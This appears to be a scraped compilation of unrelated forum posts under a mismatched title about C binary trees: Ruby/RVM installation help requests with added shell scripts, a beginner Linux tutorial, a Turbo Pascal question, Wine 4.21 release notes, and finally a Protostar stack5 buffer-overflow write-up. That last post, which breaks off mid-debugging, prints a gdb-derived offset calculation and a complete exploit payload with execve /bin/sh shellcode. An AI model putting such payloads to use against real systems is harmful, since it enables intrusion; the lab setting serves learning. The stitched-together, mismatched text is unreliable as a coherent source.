c - Parsing a read in file and storing it in a binary tree

Ruby in Vagrant setup HELP!!

Hi there. I've been having this issue a while now. I graduated bootcamp and they used vagrant for teaching Rails development. That's what I'm used to. But I wanted to try to make my own Vagrant box to start my personal development environment instead of using the one the bootcamp provided. And the first project is going to be my Web Dev portfolio in Ruby on Rails.
Well now I'm running into issues installing the latest ruby version (or even the recommended one if you don't know what you're doing, which is 2.6.6 with devkit). (Not sure how I'd go about manually installing ruby with devkit in ubuntu from the terminal.)
I'm at the point where I'm ssh'd into my Vagrant box, and I'm trying to run the command rvm install 2.7.1 and it's throwing an error at me. I'm not sure how to determine exactly what's wrong, but here's the output after that command:
[email protected]:~$ rvm install 2.7.1
Searching for binary rubies, this might take some time.
Found remote file https://rvm_io.global.ssl.fastly.net/binaries/ubuntu/18.04/x86_64/ruby-2.7.1.tar.bz2
Checking requirements for ubuntu.
Requirements installation successful.
ruby-2.7.1 - #configure
ruby-2.7.1 - #download
Downloaded archive checksum did not match!
ruby-2.7.1 - #validate archive
bzip2: Data integrity error when decompressing.
    Input file = (stdin), output file = (stdout)
It is possible that the compressed file(s) have become corrupted.
You can use the -tvv option to test integrity of such files.
You can use the `bzip2recover' program to attempt to recover
    data from undamaged sections of corrupted files.
tar: Child returned status 2
tar: Error is not recoverable: exiting now
bzip2: Data integrity error when decompressing.
    Input file = (stdin), output file = (stdout)
It is possible that the compressed file(s) have become corrupted.
You can use the -tvv option to test integrity of such files.
You can use the `bzip2recover' program to attempt to recover
    data from undamaged sections of corrupted files.
tar: Child returned status 2
tar: Error is not recoverable: exiting now
bzip2: Data integrity error when decompressing.
    Input file = (stdin), output file = (stdout)
It is possible that the compressed file(s) have become corrupted.
You can use the -tvv option to test integrity of such files.
You can use the `bzip2recover' program to attempt to recover
    data from undamaged sections of corrupted files.
tar: Child returned status 2
tar: Error is not recoverable: exiting now
The downloaded package for https://rvm_io.global.ssl.fastly.net/binaries/ubuntu/18.04/x86_64/ruby-2.7.1.tar.bz2, Does not contains single 'bin/ruby' or 'ruby-2.7.1', Only '' were found instead.
Mounting remote ruby failed with status 4, trying to compile.
Checking requirements for ubuntu.
Requirements installation successful.
Installing Ruby from source to: /home/vagrant/.rvm/rubies/ruby-2.7.1, this may take a while depending on your cpu(s)...
ruby-2.7.1 - #downloading ruby-2.7.1, this may take a while depending on your connection...
Downloaded archive checksum did not match!
ruby-2.7.1 - #extracting ruby-2.7.1 to /home/vagrant/.rvm/src/ruby-2.7.1......
Error running '__rvm_package_extract /home/vagrant/.rvm/archives/ruby-2.7.1.tar.bz2 /home/vagrant/.rvm/tmp/rvm_src_2151',
please read /home/vagrant/.rvm/log/1593047102_ruby-2.7.1/extract.log
There has been an error while trying to extract the source. Halting the installation.
There has been an error fetching the ruby interpreter. Halting the installation.
[email protected]:~$
Here is my Vagrantfile, also. Pretty basic:
    Vagrant.configure("2") do |config|
      config.vm.box = "ubuntu/bionic64"
      config.vm.network "forwarded_port", guest: 3000, host: 3000
      config.vm.provision "shell", privileged: false, inline: <<-SHELL
        echo "==> Installing RVM..."
        # https://rvm.io/rvm/install
        curl -sSL https://rvm.io/mpapis.asc | gpg --import -
        curl -sSL https://rvm.io/pkuczynski.asc | gpg --import -
        curl -sSL https://get.rvm.io | bash -s stable
        source "$HOME/.rvm/scripts/rvm"
        rvm install 2.6.6
        gem install rails
      SHELL
      config.vm.synced_folder ".", "/vagrant_files"
      # Both VirtualBox settings in one provider block
      config.vm.provider "virtualbox" do |vb|
        vb.memory = "4096"
        vb.cpus = 8
      end
    end
Any help will be greatly appreciated. I've been trying to get help on this and this is the furthest so far I think I've gotten besides this: I did get ruby and rails to install by running sudo apt install ruby, which gives me a really old version, and then the same with Rails when I try to install that the same way; it gives me version 4.something when it's past 6.0.3!
If I could just get a newer version of ruby working and I can install rails, then I'm set!
submitted by kylespartan626 to ruby

Having trouble installing RVM/Ruby in my first Vagrant Box

Hello. I'm in desperate need of help with this. So I haven't done much on my own outside of my coding bootcamp I graduated from yet. They had me download a set of files that included everything set up for Vagrant. But I wanted to recreate the environment for myself so that everything came from me and doesn't have any files related to the bootcamp anymore.
I'm going through the tutorial of just creating the folder you want your code environment in, running the vagrant init command in the terminal and creating everything that way. I'm at the point of installing RVM and Ruby, specifically 2.7.1 which is the latest as of the time of this post. I'm getting an error though.
Here's the output when I run "rvm install ruby-2.7.1":
Searching for binary rubies, this might take some time.
Found remote file https://rvm_io.global.ssl.fastly.net/binaries/ubuntu/18.04/x86_64/ruby-2.7.1.tar.bz2
Checking requirements for ubuntu.
Requirements installation successful.
ruby-2.7.1 - #configure
ruby-2.7.1 - #download
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 21.0M  100 21.0M    0     0  23.7M      0 --:--:-- --:--:-- --:--:-- 23.7M
Downloaded archive checksum did not match!
ruby-2.7.1 - #validate archive
bzip2: Data integrity error when decompressing.
    Input file = (stdin), output file = (stdout)
It is possible that the compressed file(s) have become corrupted.
You can use the -tvv option to test integrity of such files.
You can use the `bzip2recover' program to attempt to recover
    data from undamaged sections of corrupted files.
tar: Unexpected EOF in archive
tar: Error is not recoverable: exiting now
bzip2: Data integrity error when decompressing.
    Input file = (stdin), output file = (stdout)
It is possible that the compressed file(s) have become corrupted.
You can use the -tvv option to test integrity of such files.
You can use the `bzip2recover' program to attempt to recover
    data from undamaged sections of corrupted files.
tar: Unexpected EOF in archive
tar: Error is not recoverable: exiting now
ruby-2.7.1 - #extract
bzip2: Data integrity error when decompressing.
    Input file = (stdin), output file = (stdout)
It is possible that the compressed file(s) have become corrupted.
You can use the -tvv option to test integrity of such files.
You can use the `bzip2recover' program to attempt to recover
    data from undamaged sections of corrupted files.
tar: Unexpected EOF in archive
tar: Unexpected EOF in archive
tar: Error is not recoverable: exiting now
Unpacking bin-ruby-2.7.1.tar.bz2 failed.
Mounting remote ruby failed with status 6, trying to compile.
Checking requirements for ubuntu.
Requirements installation successful.
Installing Ruby from source to: /usr/share/rvm/rubies/ruby-2.7.1, this may take a while depending on your cpu(s)...
ruby-2.7.1 - #downloading ruby-2.7.1, this may take a while depending on your connection...
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 14.0M  100 14.0M    0     0  26.0M      0 --:--:-- --:--:-- --:--:-- 26.0M
Downloaded archive checksum did not match!
ruby-2.7.1 - #extracting ruby-2.7.1 to /usr/share/rvm/src/ruby-2.7.1......
Error running '__rvm_package_extract /usr/share/rvm/archives/ruby-2.7.1.tar.bz2 /usr/share/rvm/tmp/rvm_src_3269',
please read /home/vagrant/.rvm/log/1591896051_ruby-2.7.1/extract.log
There has been an error while trying to extract the source. Halting the installation.
There has been an error fetching the ruby interpreter. Halting the installation.
I just need to try and get this fixed so I can continue to work on my Web Dev portfolio which is based on Ruby on Rails. I'm just not understanding why I'm now having all this trouble with my development environment when using the files that the bootcamp gave me is fine. It's just that those install older versions of ruby and rails and stuff and I want the latest working versions of everything. Any help is greatly appreciated.
submitted by kylespartan626 to vagrant
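The line both posts trip over, "Downloaded archive checksum did not match!", is rvm's own integrity check refusing to extract a download whose hash differs from the one it expects. As an added example (not code from either post, nor rvm's), this POSIX sh script applies the same discipline to a plain download: hash the file first, test the bzip2 stream as the error text suggests, and discard a cached copy that fails rather than retrying it. It assumes sha256sum and curl are installed; the expected hash and file names are placeholders.

```shell
#!/bin/sh
# Added example: verify an archive before anything extracts it.
# Assumes sha256sum (coreutils) and, for the optional stream test, bzip2.

# verify_archive FILE EXPECTED_SHA256
# Exit status: 0 = hash matches (and bzip2 stream is intact when testable),
# 1 = mismatch or corrupt stream, 2 = file missing. Nothing is extracted
# on failure; the caller decides what to do with the file.
verify_archive() {
    file=$1
    expected=$2
    if [ ! -f "$file" ]; then
        echo "verify_archive: no such file: $file" >&2
        return 2
    fi
    actual=$(sha256sum "$file" | cut -d ' ' -f 1)
    if [ "$actual" != "$expected" ]; then
        echo "verify_archive: checksum mismatch for $file" >&2
        echo "  expected: $expected" >&2
        echo "  actual:   $actual" >&2
        return 1
    fi
    # Same test bzip2 recommends in the posts' error output (-t / -tvv):
    # a matching hash of a .bz2 still gets its stream checked when bzip2 is
    # installed; otherwise the hash alone decides.
    case $file in
        *.bz2)
            if command -v bzip2 >/dev/null 2>&1; then
                bzip2 -t "$file" 2>/dev/null || return 1
            fi
            ;;
    esac
    return 0
}

# fetch_and_verify URL DEST EXPECTED_SHA256
# Downloads with curl and removes DEST if it fails verification, so a
# corrupt copy never sits in a cache waiting to be extracted on the next
# attempt (rvm keeps its copies under ~/.rvm/archives, as the log shows).
# Exit status: 0 = verified, 1 = rejected and deleted, 3 = download failed.
fetch_and_verify() {
    url=$1
    dest=$2
    expected=$3
    curl -fsSL -o "$dest" "$url" || return 3
    if ! verify_archive "$dest" "$expected"; then
        rm -f "$dest"
        return 1
    fi
    return 0
}

# Placeholder usage (hash and URL are not real values):
#   fetch_and_verify "https://example.invalid/ruby-2.7.1.tar.bz2" \
#       "$HOME/.rvm/archives/ruby-2.7.1.tar.bz2" "<expected-sha256-here>" \
#       && tar -xjf "$HOME/.rvm/archives/ruby-2.7.1.tar.bz2"
```

When a cached archive under ~/.rvm/archives fails a check like this, delete it and download again; re-running the extract on the same bytes, which is what both logs show rvm doing, cannot succeed.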

Linux/Unix for beginners. tutorial 1 (cont 1)

If you find this helpful, please kindly upvote and follow to keep updated on the next tutorials.
In this tutorial we will introduce the Linux OS and compare it with Windows.
Windows Vs. Linux: File System
Linux Types of Files
Windows Vs. Linux: Users
Windows Vs. Linux: File Name Convention
Windows Vs. Linux: HOME Directory
Windows Vs. Linux: Other Directories
Windows Vs. Linux: Key Differences
Windows Vs. Linux File System
In Microsoft Windows, files are stored in folders on different data drives like C: D: E:
But, in Linux, files are ordered in a tree structure starting with the root directory.
This root directory can be considered the start of the file system, and it further branches out into various other subdirectories. The root is denoted with a forward slash '/'.
A general tree file system on your UNIX may look like this.

Types of Files
In Linux and UNIX, everything is a file. Directories are files, files are files, and devices like the printer, mouse, keyboard etc. are files.
Let's look into the File types in more detail.
General Files
General files are also called ordinary files. They can contain an image, video, program or simply text. They can be in ASCII or a binary format. These are the most commonly used files by Linux users.
Directory Files
These files are a warehouse for other file types. You can have a directory file within a directory (sub-directory). You can think of them as the 'Folders' found in the Windows operating system.
Device Files:
In MS Windows, devices like printers, CD-ROMs and hard drives are represented as drive letters like G: H:. In Linux, they are represented as files. For example, if the first SATA hard drive had three primary partitions, they would be named and numbered as /dev/sda1, /dev/sda2 and /dev/sda3.
Note: All device files reside in the directory /dev/
All the above file types (including devices) have permissions, which allow a user to read, edit or execute (run) them. This is a powerful Linux/Unix feature. Access restrictions can be applied for different kinds of users, by changing permissions.
Windows Vs. Linux: Users
There are 3 types of users in Linux.
Regular
Administrative(root)
Service
Regular User
A regular user account is created for you when you install Ubuntu on your system. All your files and folders are stored in /home/username, which is your home directory. As a regular user, you do not have access to the directories of other users.
Root User
Other than your regular account, another user account called root is created at the time of installation. The root account is a superuser who can access restricted files, install software and has administrative privileges. Whenever you want to install software, make changes to system files or perform any administrative task on Linux, you need to log in as the root user. Otherwise, for general tasks like playing music and browsing the internet, you can use your regular account.
Service user
Linux is widely used as a Server Operating System. Services such as Apache, Squid, email, etc. have their own individual service accounts. Having service accounts increases the security of your computer. Linux can allow or deny access to various resources depending on the service.
Note:
You will not see service accounts in the Ubuntu Desktop version.
Regular accounts are called standard accounts in Ubuntu Desktop.
In Windows, there are 4 types of user accounts.
Administrator
Standard
Child
Guest
Windows Vs. Linux: File Name Convention
In Windows, you cannot have 2 files with the same name in the same folder. See below:

While in Linux, you can have 2 files with the same name in the same directory, provided they use different cases.

Windows Vs. Linux: HOME Directory
For every user in Linux, a directory is created as /home/username.
Consider a regular user account "Tom". He can store his personal files and directories in the directory "/home/tom". He can't save files outside his user directory and does not have access to the directories of other users. For instance, he cannot access the directory "/home/jerry" of another user account "Jerry".
The concept is similar to C:\Documents and Settings in Windows.
When you boot the Linux operating system, your user directory (from the above example, /home/tom) is the default working directory. Hence the directory "/home/tom" is also called the Home directory, which is a misnomer.
The working directory can be changed using some commands which we will learn later.
Windows Vs. Linux: Other Directories
In Windows, system and program files are usually saved in the C: drive. But in Linux, you would find the system and program files in different directories. For example, the boot files are stored in the /boot directory, program and software files can be found under /bin, and device files in /dev. Below are important Linux directories and a short description of what they contain.

These are the most striking differences between Linux and other operating systems. There are more variations you will observe when switching to Linux, and we will discuss them as we move along in our tutorials.
Windows Vs. Linux:
Windows: Windows uses different data drives like C: D: E: to store files and folders.
Linux: Unix/Linux uses a tree-like hierarchical file system.

Windows: Windows has different drives like C: D: E:.
Linux: There are no drives in Linux.

Windows: Hard drives, CD-ROMs and printers are considered devices.
Linux: Peripherals like hard drives, CD-ROMs and printers are also considered files in Linux/Unix.

Windows: There are 4 types of user accounts: 1) Administrator, 2) Standard, 3) Child, 4) Guest.
Linux: There are 3 types of user accounts: 1) Regular, 2) Root and 3) Service Account.

Windows: The Administrator user has all administrative privileges on the computer.
Linux: The root user is the super user and has all administrative privileges.

Windows: In Windows, you cannot have 2 files with the same name in the same folder.
Linux: The Linux file naming convention is case sensitive. Thus, sample and SAMPLE are 2 different files in a Linux/Unix operating system.

Windows: In Windows, My Documents is the default home directory.
Linux: For every user a /home/username directory is created, which is called his home directory.
KEY DIFFERENCE
Linux is an open source operating system, so the user can change the source code as required, whereas Windows is a commercial operating system, so the user does not have access to the source code.
Linux is very secure as it is easy to detect and fix bugs, whereas Windows has a huge user base, so it becomes a target for hackers attacking Windows systems.
Linux runs faster even with older hardware, whereas Windows is slower compared to Linux.
In Linux, peripherals like hard drives, CD-ROMs and printers are considered files, whereas in Windows, hard drives, CD-ROMs and printers are considered devices.
Linux files are ordered in a tree structure starting with the root directory, whereas in Windows, files are stored in folders on different data drives like C: D: E:.
In Linux you can have 2 files with the same name in the same directory, while in Windows you cannot have 2 files with the same name in the same folder.
In Linux you would find the system and program files in different directories, whereas in Windows, system and program files are usually saved in the C: drive.
Linux Command Line Tutorial: Manipulate Terminal with CD Commands
The most frequent tasks that you perform on your PC are creating, moving or deleting files. Let's look at various options for file management.
To manage your files, you can either use
Terminal (Command Line Interface - CLI)
File manager (Graphical User Interface -GUI)
In this tutorial, you will learn:
Why learn Command Line Interface?
Launching the CLI on Ubuntu
Present working Directory (pwd)
Changing Directories (cd)
Navigating to home directory (cd ~)
Moving to root directory (cd /)
Navigating through multiple directories
Moving up one directory level (cd ..)
Relative and Absolute Paths
Why learn Command Line Interface?
Even though the world is moving to GUI based systems, the CLI has its specific uses and is widely used in scripting and server administration. Let's look at some compelling uses:
Comparatively, commands offer more options and are flexible. Piping and stdin/stdout are immensely powerful and are not available in a GUI.
Some configurations in a GUI are up to 5 screens deep, while in a CLI it's just a single command.
Moving or renaming thousands of files in a GUI will be time-consuming (using Control/Shift to select multiple files), while in the CLI, using regular expressions, you can do the same task with a single command.
The CLI loads fast and does not consume RAM compared to a GUI. In crunch scenarios this matters.
Both GUI and CLI have their specific uses. For example, in a GUI, performance monitoring graphs give instant visual feedback on system health, while seeing hundreds of lines of logs in the CLI is an eyesore.
You must learn to use both the GUI (File Manager) and the CLI (Terminal).
The GUI of a Linux based OS is similar to any other OS. Hence, we will focus on the CLI and learn some useful commands.
Launching the CLI on Ubuntu
There are 2 ways to launch the terminal.
1) Go to the Dash and type terminal

2) Or you can press CTRL + Alt + T to launch the Terminal
Once you launch the CLI (Terminal), you would find something like username@hostname:~$ (see image) written on it.

1) The first part of this line is the name of the user (bob, tom, ubuntu, home...)
2) The second part is the computer name or the hostname. The hostname helps identify a computer over the network. In a server environment, the hostname becomes important.
3) The ':' is a simple separator.
4) The tilde '~' sign shows that the user is working in the home directory. If you change the directory, this sign will vanish.

In the above illustration, we have moved from the /home directory to /bin using the 'cd' command. The ~ sign is not displayed while working in the /bin directory. It appears again on moving back to the home directory.
5) The '$' sign suggests that you are working as a regular user in Linux. While working as the root user, '#' is displayed.

Present Working Directory
The directory that you are currently browsing is called the present working directory. You log on to the home directory when you boot your PC. If you want to determine the directory you are presently working in, use the command:
pwd

The pwd command stands for print working directory.
The above figure shows that /home/guru99 is the directory we are currently working in.
Changing Directories
If you want to change your current directory, use the 'cd' command.
cd /tmp
Consider the following example.

Here, we moved from directory /tmp to /bin to /usr and then back to /tmp.
Navigating to home directory
If you want to navigate to the home directory, then type cd.

cd
You can also use the cd ~ command.

cd ~
Moving to root directory
The root of the file system in Linux is denoted by '/', similar to 'C:\' in Windows.
Note: In Windows, you use the backward slash "\", while in UNIX/Linux the forward slash "/" is used.
Type 'cd /' to move to the root directory.
cd /

TIP: Do not forget the space between cd and /. Otherwise, you will get an error.
Navigating through multiple directories
You can navigate through multiple directories at the same time by specifying the complete path.
Example: If you want to move to the /cpu directory under /dev, we do not need to break this operation into two parts.
Instead, we can type 'cd /dev/cpu' to reach the directory directly.
cd /dev/cpu

Moving up one directory level
For navigating up one directory level, try:
cd ..

Here, by using the 'cd ..' command, we have moved up one directory from '/dev/cpu' to '/dev'.
Then, by using the same command again, we have jumped from '/dev' to the '/' root directory.
Relative and Absolute Paths
A path in computing is the address of a file or folder.
Example: in Windows, C:\documentsandsettings\user\downloads; in Linux, /home/user/downloads.
There are two kinds of paths:
1. Absolute Path:
Let's say you have to browse the images stored in the Pictures directory of the home folder 'guru99'.
The absolute file path of the Pictures directory is /home/guru99/Pictures.
To navigate to this directory, you can use the command:
cd /home/guru99/Pictures

This is called an absolute path as you are specifying the full path to reach the file.
2. Relative Path:
The relative path comes in handy when you have to browse another subdirectory within a given directory.
It saves you the effort of typing complete paths all the time.
Suppose you are currently in your home directory. You want to navigate to the Downloads directory.
You do not need to type the absolute path
cd /home/guru99/Downloads

Instead, you can simply type 'cd Downloads' and you would navigate to the Downloads directory, as you are already inside the '/home/guru99' directory.
cd Downloads
This way you do not have to specify the complete path to reach a specific location within the same directory in the file system.
Summary:
To manage your files, you can use either the GUI (File manager) or the CLI (Terminal) in Linux. Both have their relative advantages. In this tutorial series, we will focus on the CLI aka the Terminal.
You can launch the terminal from the dashboard or use the shortcut key Ctrl + Alt + T.
The pwd command gives the present working directory.
You can use the cd command to change directories.
An absolute path is the complete address of a file or directory.
A relative path is the location of a file or directory relative to the current directory.
Relative paths help avoid typing complete paths all the time.
Command: cd or cd ~
Description: Navigate to the HOME directory
Command: cd ..
Description: Move one level up
Command: cd <directory>
Description: Change to a particular directory
Command: cd /
Description: Move to the root directory
If you find this helpful, kindly upvote and follow to keep updated on the next posts.
submitted by bogolepov to Hacking_Tutorials
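As an added example (not part of the post above), the POSIX sh script below exercises what the tutorial covers against a constructed directory tree: the cd forms (absolute path, relative path, cd ..), case-sensitive file names, and the three file types. A temporary directory stands in for / and its home/guru99 subdirectory for the home directory, so nothing on the real system is touched; file and directory names are constructed.

```shell
#!/bin/sh
# Added example, not from the tutorial. BASE (a temp directory) stands in
# for "/" and BASE/home/guru99 for the home directory.

# build_tree BASE: creates the constructed sample tree used below.
build_tree() {
    base=$1
    mkdir -p "$base/home/guru99/Pictures" "$base/home/guru99/Downloads"
    # Two different files whose names differ only in case: allowed in one
    # Linux directory, impossible in one Windows folder.
    printf 'lower\n' > "$base/home/guru99/sample"
    printf 'upper\n' > "$base/home/guru99/SAMPLE"
}

# rel BASE: prints the present working directory with BASE stripped, so
# it reads like a real absolute path ("/" for BASE itself).
rel() {
    p=${PWD#"$1"}
    printf '%s\n' "${p:-/}"
}

# walk BASE: runs the tutorial's navigation sequence and prints
# "<command> => <directory>" after each step. The steps run in a subshell
# so the caller's working directory is left unchanged.
walk() {
    base=$(cd "$1" && pwd -P) || return 1
    (
        cd "$base/home/guru99" || exit 1   # absolute path (cd /home/guru99)
        printf 'cd /home/guru99 => %s\n' "$(rel "$base")"
        cd Downloads || exit 1             # relative path, resolved against pwd
        printf 'cd Downloads => %s\n' "$(rel "$base")"
        cd .. || exit 1                    # one level up
        printf 'cd .. => %s\n' "$(rel "$base")"
        cd ../.. || exit 1                 # two levels up: back at the "/" stand-in
        printf 'cd ../.. => %s\n' "$(rel "$base")"
    )
}

# count_ignoring_case DIR NAME: number of entries in DIR equal to NAME when
# case is ignored. A result of 2 for "sample" shows that sample and SAMPLE
# are two distinct files on Linux.
count_ignoring_case() {
    n=0
    want=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    for f in "$1"/*; do
        [ -e "$f" ] || continue
        got=$(basename "$f" | tr 'A-Z' 'a-z')
        if [ "$got" = "$want" ]; then
            n=$((n + 1))
        fi
    done
    echo "$n"
}

# file_kind PATH: classifies PATH with the tutorial's three file types.
file_kind() {
    if [ -d "$1" ]; then
        echo directory
    elif [ -c "$1" ] || [ -b "$1" ]; then
        echo device            # character or block device, e.g. /dev/null, /dev/sda1
    elif [ -f "$1" ]; then
        echo general           # ordinary file: text, image, program
    else
        echo unknown
    fi
}
```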

Turbo pascal 7.0 question

[Resolved]
Is it possible to convert Input (=stdin) from Text to generic File so that I could use blockread() with it?
So far the only option for me to read binary data from Input is per-character read(ch: char), which is going to be kind of slow I guess (I use settextbuf() with a 4k buffer to reduce actual reads, but still it is an extra function call for each byte).
submitted by flakebloom to pascal

Wine 4.21 Released

The Wine development release 4.21 is now available.
 
https://www.winehq.org/announce/4.21 
 
What's new in this release (see below for details):
 
- HTTP proxy configuration through DHCP.
- Parameter block support in D3DX9.
- A few more dlls converted to PE.
- Various bug fixes.
 
The source is available from the following locations:
http://dl.winehq.org/wine/source/4.x/wine-4.21.tar.xz
http://mirrors.ibiblio.org/wine/source/4.x/wine-4.21.tar.xz
 
Binary packages for various distributions will be available from:
http://www.winehq.org/download 
 
You will find documentation on
http://www.winehq.org/documentation 
 
You can also get the current source directly from the git repository.
Check
http://www.winehq.org/git for details. 
 
Wine is available thanks to the work of many people.
See the file AUTHORS in the distribution for the complete list.
 
 
Bugs fixed in 4.21 (total 50):
 
15670 .NET applications that make use of System.IO.IsolatedStorage crash (missing "HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\ " registry subkey)
22030 LegoLand: crashes at main menu without native directmusic
23729 Need For Speed: Shift - throbbing glob around language and save game name not as noticable on Wine
23821 Super Mario Brothers X hangs in quartz?
25264 treeview wstr overrun in TVN_GETDISPINFOW (ExamXML crashes when opening an XML file)
26119 kernel32/pipe tests show some valgrind warnings
26721 Button and Static controls not painting in Win NT V6.00 and later modes
28506 kernel32/change.ok test fails occasionally on linux
28602 Ccleaner: installer has a non-fatal crash
30499 Multiple Avira AVG product installers crash due to access of undocumented PEB field "UnicodeCaseTableData" (AVG Free Edition 2012-2014, TuneUp Utilities 2014)
33284 Xin Shendiao Xialv ("The Giant Eagle and It's Companion") has some graphical issues
33352 Family Tree Maker 2012 crashes when trying to start program
34048 IE8 x64 for Server 2003 exits silently
35252 Multiple applications need ITaskScheduler::Enum implementation (lsTasks, Toad for MySQL Freeware 7.x)
36121 valgrind leaks in ntdll/tests/change.c
36266 valgrind shows several leaks in dmusic/tests/dmusic.c
36404 valgrind shows a leak in faultrep/tests/faultrep.c
36405 valgrind shows a leak in msxml3/tests/xmlview.c
36615 valgrind shows a definite leak in mshtml/tests/htmldoc.c
38300 using winegcc with stdin passes arguments in the wrong position to gcc
38659 Windows Sysinternals Process Explorer v16.x crashes on startup (registry SID profile data in 'ProfileList' must contain 'Flags' and 'ProfileImagePath' values)
39210 Dream Aquarium (screensaver) fails to read monitor power state ('{4d36e96e-e325-11ce-bfc1-08002be10318}' monitor device class registry data missing)
40970 Can't run LEGO DD anymore
43323 Beamng.drive: Cars render incorrectly
45661 Gothic 2 crashes with music enabled without native directmusic
46748 Splinter Cell: Blacklist shows some 'script code' instead of text
47414 valgrind shows a definite memory leak in dlls/ntdll/loader.c
47489 The appearance of configurable options in Audacity is broken
47547 Steam Overlay stopped working
47620 unimplemented function KERNEL32.dll.GetCurrentConsoleFontEx
47656 Crysis 1: game in DX10 cannot be started (also causing Very High graphical setting not available) in Vista and up
47724 .NET Framework 3.5 SP1 not installing
47740 dotnet20sp2: fails to install on arch and derivatives
47790 putty.exe displays an error at startup when placed in a path with accented characters.
47809 mscrt: strftime is missing some substutions
47832 FindFirstFileExW believes every directory entry has been read if NtQueryDirectoryFile underfills buffer
47935 Nextiva: Logging in fails with "Client is unable to connect to the server."
47991 motec i2 pro v1.0 data logger fails to start
48016 karafunplayer: Call from 0x7124d239 to unimplemented function shcore.dll.GetScaleFactorForMonitor, aborting
48072 Everquest Classic: Textures not working correctly
48087 Firestorm viewer can't login to Second Life grid since 4.19
48104 Graphics load improperly in LEGO Island 2
48111 myodbc-installer v5.x (part of Toad for MySQL Freeware 7.x) crashes when querying for installed drivers ('SQLGetInstalledDrivers' doesn't handle NULL 'sizeout')
48114 wine: could not open working directory L"unix\\home\\tod\\", starting in the Windows directory.
48140 Archicad 22 needs missing SHCreateDataObject from shell32
48157 SetThreadDescription() return value E_NOTIMPL crashes StarCitizen
48170 start.exe: /min no longer works
48176 cannot select drawn line in excel2003 sheet (for removal)
48178 upgrade to "version 4 stable" made EXCEL2003 unusable (even after re-installing/purging wine and EXCEL)
48188 wine fails to load, "kernelbase.dll" failed to initialize, aborting
submitted by catulirdit to linux_gaming

Protostar stack5 shellcode not working in the buffer (outside is ok)

Protostar Stack5 buffer overflow (32 bits shellcode)
I got a strange behaviour (strange maybe not, BUT one that I could not explain :-)
When I put the shellcode inside the buffer it does not work, but when it is outside all is working fine.
It's the protostar stack5 binary in its original VM (constructed from the ISO on Linux 32 bits), so I would not give further info on the binary itself (stack is executable, ASLR is off, ....)
Let me explain and let's go with gdb!

Finding the buffer overflow
gdb$ disass _start
Dump of assembler code for function _start:
0x08048310 <_start+0>: xor ebp,ebp
0x08048312 <_start+2>: pop esi
0x08048313 <_start+3>: mov ecx,esp
0x08048315 <_start+5>: and esp,0xfffffff0
0x08048318 <_start+8>: push eax
0x08048319 <_start+9>: push esp
0x0804831a <_start+10>: push edx
0x0804831b <_start+11>: push 0x80483e0
0x08048320 <_start+16>: push 0x80483f0
0x08048325 <_start+21>: push ecx
0x08048326 <_start+22>: push esi
0x08048327 <_start+23>: push 0x80483c4 # Real entry point
0x0804832c <_start+28>: call 0x80482f8 <__libc_start_main@plt>
0x08048331 <_start+33>: hlt
0x08048332 <_start+34>: nop
0x08048333 <_start+35>: nop
(....)
Let's disass main:
gdb$ disass main
Dump of assembler code for function main:
0x080483c4 : push ebp # Prologue...
0x080483c5 : mov ebp,esp # ...
0x080483c7 : and esp,0xfffffff0 # ... address alignment
0x080483ca : sub esp,0x50 # ... reserve space on stack
0x080483cd : lea eax,[esp+0x10] # address of the start of the buffer
0x080483d1 : mov DWORD PTR [esp],eax # put the arg on the stack
0x080483d4 : call 0x80482e8 <gets@plt> # call to gets (char*)
0x080483d9 : leave
0x080483da : ret
End of assembler dump.
Let's retrieve EBP's address and value:
gdb$ x/wx $ebp
0xbffff7b8: 0xbffff838

Let's retrieve EIP's address and its value:
gdb$ x/wx $ebp+0x4
0xbffff7bc: 0xb7eadc76
Let's check the EIP return address to be sure we're fine:
gdb$ x/5i 0xb7eadc76
0xb7eadc76 <__libc_start_main+230>: mov DWORD PTR [esp],eax
0xb7eadc79 <__libc_start_main+233>: call 0xb7ec60c0 <*__GI_exit>
0xb7eadc7e <__libc_start_main+238>: xor ecx,ecx
0xb7eadc80 <__libc_start_main+240>: jmp 0xb7eadbc0 <__libc_start_main+48>
0xb7eadc85 <__libc_start_main+245>: mov eax,DWORD PTR [ebx+0x37d4]
Good! It's back in __libc_start_main.

Let's get the buffer (gets) start address:
p/x $esp+0x10
$1 = 0xbffff770

Write down the most important values for our exploitation:
---Reminder-------------------------------------------------------
RET EBP : 0xbffff7b8: 0xbffff838
RET EIP : 0xbffff7bc: 0xb7eadc76
buffer start address: 0xbffff770
-----------------------------------------------------------------
Let's do some computation to overwrite EIP:
# EIP's address - buffer's address
# gdb$ p/d 0xbffff7bc - 0xbffff770
# $1 = 0x76
We need 76 bytes, then we can start to overwrite EIP (+ 4 bytes for EIP):
python -c 'print "A"*72 + "BBBB" + "CCCC"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
A is padding, B is EBP, C is EIP.

Let's try our buffer overflow!
./stack5
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
dmesg
[50576.044013] stack5[13898]: segfault at 43434343 ip 43434343 sp bffff7e0 error 4
EIP has been overwritten and it is working fine (43 in ASCII => 'C')!

Shellcode Exploitation
We will use a well-known and working shellcode:
https://security.stackexchange.com/questions/73878/program-exiting-after-executing-int-0x80-instruction-when-running-shellcode
The shellcode is 58 bytes. We will construct our payload like this:
5 (NOP) + 58 (shellcode) + 9 (padding NOP) + 4 (EBP) + 4 (EIP) = 76 + 4 EIP bytes, as computed
Important: here I put the shellcode IN the buffer
r <<< $(python -c 'print "\x90"*5 + "\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*9 + "\x38\xf8\xff\xbf" + "\x70\xf7\xff\xbf"') 
\x38\xf8\xff\xbf = EBP original address = 0xbffff838
\x70\xf7\xff\xbf = overwritten EIP = buffer start address = 0xbffff770

In GDB, break just before the ret instruction and check esp to be sure it will jump where we want:
gdb$ x/wx $esp
